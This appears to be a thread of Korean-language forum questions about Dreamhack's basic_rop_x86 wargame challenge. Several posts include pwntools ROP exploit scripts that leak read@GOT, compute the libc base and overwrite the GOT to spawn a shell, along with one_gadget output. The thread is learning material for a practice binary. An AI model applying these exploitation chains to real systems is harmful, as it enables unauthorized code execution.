basic_rop_x64 문제를 풀었을 떄 사용한 페이로드의 경우 payload = b'1'*0x48 write(1, read_got, 0) payload += p64(ret_rdi) + p64(1) payload += p64(ret_rsi_r15) + p64(read_got) + p64(8) payload += p64(write_plt) return to mainS payload += p64(main) 위와 같이 구성했습니다. ret_rdi를 통해 1을 rdi에 pop하고, ret_rsi_rsi를 통해 rsi에 read_got의 주소를, r15에 8을 넣고 write_plt 함수를 호출하여 read_got 주소를 읽었습니다. basic_rop_x86 문제를 풀 때도 마찬가지로 pop을 3번 할 수 있는 코드 가젯을 찾고 활용하였습니다. ret_esi_edi_ebp = re.find_gadget(['pop esi', 'pop edi', 'pop ebp', 'ret'])[0] #write(1 , read_got, 4) payload = b'1' * 0x48 payload += p32(ret_esi_edi_ebp) payload += p32(1) + p64(read_got) +p32(4) payload += p32(write_plt) payload += p32(main) 실행하면 r.recvn(4) 부분에서 값을 받지 못하여 다른 사람들이 풀이한 코드를 확인해보니 read() 실제 주소 흭득 -> write(1, read@got, 4) payload += p32(write_plt) payload += p32(pppr) payload += p32(1) payload += p32(read_got) payload += p32(4) BSS 영역에 "/bin/sh" 쓰기 -> read(0, bss, 8) payload += p32(read_plt) 위와 같이 write_plt를 먼저 호출하고 코드 가젯을 활용하는 것을 확인했습니다. 질문사항은 다음과 같습니다. write_plt와 같은 함수를 호출하려면 3개의 인자를 pop하는 작업이 선행되야 하는게 아닌가요? 제가 풀이한 코드가 잘못되었나요?(write_plt 주소를 return하지 않고 제가 작성한 코드의 ret_esi_edi_ebp를 return하면 왜 잘못된건지 모르겠습니다.)

함수 호출 규약이나 rop보면 스택 이용하고, 어느 내용을 보면 ebx, ecx, edx를 사용하네요?

from pwn import * def slog(symbol, addr): return success(symbol + ": " + hex(addr)) p=remote('host3.dreamhack.games',13804) e=ELF('./basic_rop_x86') libc=ELF("./libc.so.6",checksec=False) read_got=e.got['read'] read_plt=e.plt['read'] write_plt=e.plt['write'] main=e.symbols["main"] read_offset=libc.symbols['read'] system_offset=libc.symbols['system'] sh= list(libc.search(b"/bin/sh"))[0] pop_esi_edi_ebp=0x08048689 pop_ebp=0x0804868b #stage 1 payload=b'A'*0x48 #write(1,read@got,8) payload+=p32(write_plt) payload+=p32(pop_esi_edi_ebp) payload+=p32(1) payload+=p32(read_got) payload+=p32(4) payload+=p32(main) p.send(payload) #main함수 끝나기전에 출력된것 삭제 p.recvuntil(b'A'*0x40) #read 받아오기 read=u32(p.recv(4)) lb=read-read_offset system=lb+system_offset binsh=lb+sh slog("read", read) slog("libc base", lb) slog("system", system) slog("/bin/sh", binsh) payload=b'A'*0x48 payload+=p32(system) payload+=p32(pop_ebp)+p32(binsh) p.send(payload) p.recvuntil(b'A'*0x40) p.interactive() ret2main기법을 사용해서 다음과 같이 작성해주었는데 pop_esi_edi_ebp와 같이 레지스터를 이용해서 스택에 쌓아둔 값을 빼주는 이유가 esp를 높은 주소로 보내주기 위해서이고 x86아키텍처에서는 스택으로 인자를 전달하기에 값이 저장된 레지스터는 인자전달에 영향을 미치지 않는다고 알고있습니다. 그런데 x86아키텍처에서 스택으로 인자를 전달한다면, 인자를 몇개까지 받아야하는지는 어떻게 알 수 있나요? 놓인 순서대로 인자로 들어간다면, write_plt다음에 실행된 pop_esi_edi_ebp도 인자로 들어가야할거같은데 제 생각과는 다른거 같아서 질문드립니다.

from pwn import * context.log_level = 'debug' p = remote('host1.dreamhack.games', 21445) libc = ELF("./libc.so.6") e = ELF("./basic_rop_x86") read_got = e.got['read'] write_plt = e.plt['write'] read_plt = e.plt['read'] read_offset = libc.symbols['read'] pppr = 0x8048689 one_gadget_offset = 0x5f066 payload = '' payload += 'a'* 0x48 payload += p32(write_plt) payload += p32(pppr) payload += p32(1) payload += p32(read_got) payload += p32(4) payload += p32(read_plt) payload += p32(pppr) payload += p32(0) payload += p32(read_got) payload += p32(4) payload += p32(read_plt) p.sendline(payload) dummy = p.recv(0x40) read_addr = u32(p.recv(4)) #print hex(read_addr) libc_base = read_addr - read_offset one_gadget = libc_base + one_gadget_offset #print hex(one_gadget) p.sendline(p32(one_gadget)) p.interactive() $ one_gadget ./libc.so.6 0x3a80c execve("/bin/sh", esp+0x28, environ) constraints: esi is the GOT address of libc [esp+0x28] == NULL 0x3a80e execve("/bin/sh", esp+0x2c, environ) constraints: esi is the GOT address of libc [esp+0x2c] == NULL 0x3a812 execve("/bin/sh", esp+0x30, environ) constraints: esi is the GOT address of libc [esp+0x30] == NULL 0x3a819 execve("/bin/sh", esp+0x34, environ) constraints: esi is the GOT address of libc [esp+0x34] == NULL 0x5f065 execl("/bin/sh", eax) constraints: esi is the GOT address of libc eax == NULL 0x5f066 execl("/bin/sh", [esp]) constraints: esi is the GOT address of libc [esp] == NULL one_gadget을 이용해셔 풀려고 했는데 문제에서 준 libc파일에서 나오는 one_gadget모두를 써보았으나 eof에러가 납니다. 혹시 exploit 중에 문제가 있는지 봐 주실 수 있나요?

64bit 풀 때와 같은 방법으로 system 함수 offset을 구했는데 32bit에서는 system 부르라니까 엉뚱한 곳으로 가네요. 근데 서버에 연결해서 libc = ELF("libc.so.6")넣었을 때는 정상 작동합니다. 로컬에서만 이상한 곳으로 넘어가요. 아무래도 함수 offset 계산하는 곳이 문제인 것 같습니다. 32bit 64bit 프로그램 따라 참조하는 라이브러리가 다를 수 있나요? 그 프로그램이 참조하고 있는 라이브러리 버전을 확인할 방법이 있나요? 아래는 제 소스 코드입니다. from pwn import * context.log_level = 'debug' e=ELF("./basic_rop_x86") p=process("./basic_rop_x86") libc = ELF("/lib/x86_64-linux-gnu/libc-2.31.so") #p=remote("host3.dreamhack.games", 9643) #libc = ELF("libc.so.6") pause() write_plt=e.plt["write"] read_plt=e.plt["read"] read_got=e.got["read"] ret=0x080483c2 pop3=0x08048689 pl=b'' pl+=b'A'*0x48 #write(1,read_got,0x4) pl+=p32(write_plt) pl+=p32(pop3) pl+=p32(1) pl+=p32(read_got) pl+=p32(0x4) #read(0,read_got,0x4+0x8) pl+=p32(read_plt) pl+=p32(pop3) pl+=p32(0) pl+=p32(read_got) pl+=p32(0x4+0x8) #read(/bin/sh) pl+=p32(read_plt) pl+=p32(0) pl+=p32(read_got+0x4) p.send(pl) p.recv(0x40) read = u32(p.recv(4)) print("read: ",hex(read)) print("basslib: ",hex(read-libc.symbols['read'])) print("system: ",hex(read-libc.symbols['read']+libc.symbols['system'])) p.send(p32(read-libc.symbols['read']+libc.symbols['system'])+b'/bin/sh\x00') p.interactive() `

payload = "a"*0x40 # dummy payload += "a" * 4 # sfp payload += p32(read_plt) payload += p32(pppr) # pop pop pop ret payload += p32(0) payload += p32(bss) payload += p32(8) payload += p32(write_plt) payload += p32(pppr) payload += p32(1) payload += p32(read_got) payload += p32(4) payload += p32(read_plt) payload += p32(pppr) payload += p32(0) payload += p32(read_got) payload += p32(4) payload += p32(read_plt) payload += "aaaa" payload += p32(bss) p.sendline(payload) p.send(binsh) p.recv(0x40) read_address = int(p.recv(4)[::-1].encode("hex"),16) libc_base = read_address - read_offset system_address = libc_base + system_offset p.send(p32(system_address)) p.interactive() 파이썬으로 exploit코드를 다음과 같이 짰습니다. read를 통해 bss영역에 /bin/sh를 저장시키고 write를 통해 read address를 leak했습니다. 제공된 libc.so.6을 통해 system함수와 read함수의 offset을 찾았습니다. 이를 통해 libc base를 얻을 수 있고 system함수의 offset을 더해서 address를 구해 read함수로 read_got에 system address를 overwrite했습니다 그 다음 read함수(system)을 호출해 exploit하는 건데 어느 코드부분이 잘 못 되었는데 쉘이 안따집니다ㅠㅠ

페이로드 작성할때 자꾸 이 에러가 뜨는데 다른 사람 페이로드와 같은데 왜 자꾸 이게 뜨는거죠?..

전 basic_rop_x64를 먼저 풀어보고 이 문제를 풀었는데 x64를 풀 때에는 return address를 got주소로 덮어씌워서 rop chain을 구성했는데 이번 x86문제 풀이 할 때에는 got로 하면 엉뚱한 곳으로 가서 plt로 보니까 작동을 잘 하더라구요 이유가 궁금합니다!

로컬에 ASLR 적용했고 정상적으로 쉘 뜨는것도 확인했는데 같은 코드로 서버에 접속해서 실행하면 오류가 납니다 맨처음 read_got를 write 하는 payload 보내고 recv 받는값 찍어보니까 로컬에서는 잘 읽어오는데, 서버에서는 맨 처음 buf에 저장하는 aaaa를 읽어오네요 aaaa를 읽어왔다는건 read_got에 buf 에 입력했던 a*72가 저장되어있다는건데, write가 호출됬다는건 write_plt가 스택에 잘 들어간거고 a는 딱 buf와 SFP 까지만 채워졌다는건데 원인을 모르겠네요.. 혹시 짐작되시는 원인이 있다면 알려주시면 감사하겠습니다

다른 분들 질문 통해서, X86의 경우에는 스택에 순서대로 레지스터에 들어갈 값을 넣어둔 후, 콜 하기전에 POP 해서 레지스터로 넣은 후에 SYSCall을 실행한다고 보았는데요. 위는 write 호출 규약인데요 다른분들이 작성하신 공격코드랑 레지스터가 좀 다른 것 같은데 왜 그런가요? payload += p32(write_plt) payload += p32(pppr) payload += p32(1) + p32(read_got) + p32(4) payload += (read_plt) 코드대로 라면 esi = 1 edi = read_got ebp = 0x04 가 되는 것 같은데 규약대로라면 ebx = 1 , edi = read_got , ebp=0x04가 되어야 하는것 같아서요